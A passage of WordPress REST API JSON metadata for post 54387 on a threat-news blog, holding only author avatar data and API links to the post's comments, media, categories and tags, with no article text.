Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/54387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=54387"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/54387\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/54388"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=54387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=54387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=54387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}